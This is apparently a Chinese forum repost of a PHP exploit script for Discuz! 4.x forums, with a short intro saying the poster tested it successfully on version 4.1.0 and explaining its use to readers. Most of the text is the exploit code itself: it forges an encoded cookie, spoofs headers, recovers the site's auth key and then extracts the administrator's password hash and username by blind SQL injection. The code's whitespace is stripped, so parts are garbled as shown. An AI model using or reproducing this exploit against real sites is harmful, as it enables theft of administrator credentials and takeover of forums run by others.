前段时间发过Discuz!5.0.0GBK版本的EXP

今天在CN.Tink那里看到的4.x的，我去原站转了过来，然后找了个Discuz!4.1.0测试了一下，成功，看下面截图，Discuz!5.0.0GBK版本的那个EXP又许多朋友不知道怎么用，当时我说了下，还是有朋友不明白，这次我截了图上来，不知道怎么用的朋友看下应该明白的。

图：

复制代码 代码如下:

<?php

print_r('

---------------------------------------------------------------------------

Discuz!4.xSQLinjection/admincredentialsdisclosureexploit

byrgodrgod@autistici.org

site:http://retrogod.altervista.org

dork:"poweredbydiscuz!

---------------------------------------------------------------------------

');

if($argc<3){

print_r('

---------------------------------------------------------------------------

Usage:php'.$argv[0].'hostpathOPTIONS

host:targetserver(ip/hostname)

path:pathtodiscuz

Options:

-p[port]:specifyaportotherthan80

-P[ip:port]:specifyaproxy

Example:

php'.$argv[0].'localhost/discuz/-P1.1.1.1:80

php'.$argv[0].'localhost/discuz/-p81

---------------------------------------------------------------------------

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

functionquick_dump($string)

{

$result='';$exa='';$cont=0;

for($i=0;$i<=strlen($string)-1;$i++)

{

if((ord($string[$i])<=32)|(ord($string[$i])>126))

{$result.=".";}

else

{$result.="".$string[$i];}

if(strlen(dechex(ord($string[$i])))==2)

{$exa.="".dechex(ord($string[$i]));}

else

{$exa.="0".dechex(ord($string[$i]));}

$cont++;if($cont==15){$cont=0;$result.="rn";$exa.="rn";}

}

return$exa."rn".$result;

}

$proxy_regex='(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

functionsendpacketii($packet)

{

global$proxy,$host,$port,$html,$proxy_regex;

if($proxy==''){

$ock=fsockopen(gethostbyname($host),$port);

if(!$ock){

echo'Noresponsefrom'.$host.':'.$port;die;

}

}

else{

$c=preg_match($proxy_regex,$proxy);

if(!$c){

echo'Notavalidproxy...';die;

}

$parts=explode(':',$proxy);

echo"Connectingto".$parts[0].":".$parts[1]."proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if(!$ock){

echo'Noresponsefromproxy...';die;

}

}

fputs($ock,$packet);

if($proxy==''){

$html='';

while(!feof($ock)){

$html.=fgets($ock);

}

}

else{

$html='';

while((!feof($ock))or(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))){

$html.=fread($ock,1);

}

}

fclose($ock);

}

$host=$argv[1];

$path=$argv[2];

$port=80;

$proxy="";

for($i=3;$i<$argc;$i++){

$temp=$argv[$i][0].$argv[$i][1];

if($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

if(($path[0]<>'/')or($path[strlen($path)-1]<>'/')){echo'Error...checkthepath!';die;}

if($proxy==''){$p=$path;}else{$p='http://'.$host.':'.$port.$path;}

echo"pleasewait...n";

//fromglobal.func.php

functionauthcode($string,$operation,$key=''){

$key=$key?$key:$GLOBALS['discuz_auth_key'];

$coded='';

$keylength=32;

$string=$operation=='DECODE'?base64_decode($string):$string;

for($i=0;$i<strlen($string);$i+=32){

$coded.=substr($string,$i,32)^$key;

}

$coded=$operation=='ENCODE'?str_replace('=','',base64_encode($coded)):$coded;

return$coded;

}

//stolenfrominstall.php

functionrandom($length){

$hash='';

$chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';

$max=strlen($chars)-1;

mt_srand((double)microtime()*1000000);

for($i=0;$i<$length;$i++){

$hash.=$chars[mt_rand(0,$max)];

}

return$hash;

}

$agent="Googlebot/2.1";

//seesqlerrors...youneedauthkey,

//it'savaluemixedupwiththerandomstringincache_settigns.phpandyouruser-agent,solet'sask;)

$tt="";for($i=0;$i<=255;$i++){$tt.=chr($i);}

while(1)

{

$discuz_auth_key=random(32);

$packet="GET".$p."admincp.php?action=recyclebinHTTP/1.0rn";

$packet.="CLIENT-IP:999.999.999.999rn";//spoof

$packet.="User-Agent:$agentrn";

$packet.="Host:".$host."rn";

$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$tt,"ENCODE").";rn";

$packet.="Accept:text/plainrn";

$packet.="Connection:Closernrn";

$packet.=$data;

sendpacketii($packet);

$html=html_entity_decode($html);

$html=str_replace("<br/>","",$html);

$t=explode("ANDm.password='",$html);

$t2=explode("'",$t[1]);

$pwd_f=$t2[0];

$t=explode("ANDm.secques='",$html);

$t2=explode("'n",$t[1]);

$secques_f=$t2[0];

$t=explode("ANDm.uid='",$html);

$t2=explode("'x0d",$t[1]);

$uid_f=$t2[0];

$my_string=$pwd_f."t".$secques_f."t".$uid_f;

if((strlen($my_string)==270)and(!eregi("=",$my_string))){

break;

}

}

$temp=authcode("suntzutsuntzut".$tt,"ENCODE");

//calculatingkey...

$key="";

for($j=0;$j<32;$j++){

for($i=0;$i<255;$i++){

$aa="";

if($j<>0){

for($k=1;$k<=$j;$k++){

$aa.="a";

}

}

$GLOBALS['discuz_auth_key']=$aa.chr($i);

$t=authcode($temp,"DECODE");

if($t[$j]==$my_string[$j]){

$key.=chr($i);

}

}

}

//echo"AUTHKEY->".$key."rn";

$GLOBALS['discuz_auth_key']=$key;

echo"pwdhash(md5)->";

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57));//numbers

$chars=array_merge($chars,range(97,102));//a-fletters

$j=1;$password="";

while(!strstr($password,chr(0)))

{

for($i=0;$i<=255;$i++)

{

if(in_array($i,$chars))

{

//youcanuseeverycharbecauseofbase64_decode()...sothisbypassmagicquotes...

//andsomehelpbyextract()tooverwritevars

$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";

$packet="GET".$p."admincp.php?action=recyclebin&HTTP/1.0rn";

$packet.="User-Agent:$agentrn";

$packet.="CLIENT-IP:1.2.3.4rn";

$packet.="Host:".$host."rn";

$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$sql,"ENCODE").";rn";

$packet.="Accept:text/plainrn";

$packet.="Connection:Closernrn";

$packet.=$data;

sendpacketii($packet);

if(eregi("action=groupexpiry",$html)){

$password.=chr($i);echochr($i);sleep(1);break;

}

}

if($i==255){

die("nExploitfailed...");

}

}

$j++;

}

echo"nadminuser->";

$j=1;$admin="";

while(!strstr($admin,chr(0)))

{

for($i=0;$i<=255;$i++)

{

$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";

$packet="GET".$p."admincp.php?action=recyclebin&HTTP/1.0rn";

$packet.="User-Agent:$agentrn";

$packet.="CLIENT-IP:1.2.3.4rn";

$packet.="Host:".$host."rn";

$packet.="Cookie:adminid=1;cdb_sid=1;cdb_auth=".authcode("suntzutsuntzut".$sql,"ENCODE").";rn";

$packet.="Accept:text/plainrn";

$packet.="Connection:Closernrn";

$packet.=$data;

sendpacketii($packet);

if(eregi("action=groupexpiry",$html)){

$admin.=chr($i);echochr($i);sleep(1);break;

}

if($i==255){die("nExploitfailed...");}

}

$j++;

}

functionis_hash($hash)

{

if(ereg("^[a-f0-9]{32}",trim($hash))){returntrue;}

else{returnfalse;}

}

if(is_hash($password)){

echo"exploitsucceeded...";

}

else{

echo"exploitfailed...";

}

?>

【Discuz! 4.x SQL injection / admin credentials disclosure exploit】相关文章：

★ XSS & SQL注入

★ 揭开面纱看看黑客用哪些工具(2)

★ 最详细的SQL注入相关的命令整理 (转)第1/2页

★ 当菜鸟遇上黒客(5):黒客入侵窗口:IIS

★ 轻松设置让系统不受恶意代码攻击

★ 详解BMP木马

★ 密码破解全教程

★ rm格式插入广告代码

★ 渗透中用openrowset搞shell的方法

★ 阿Ｄ常用的一些注入命令整理小结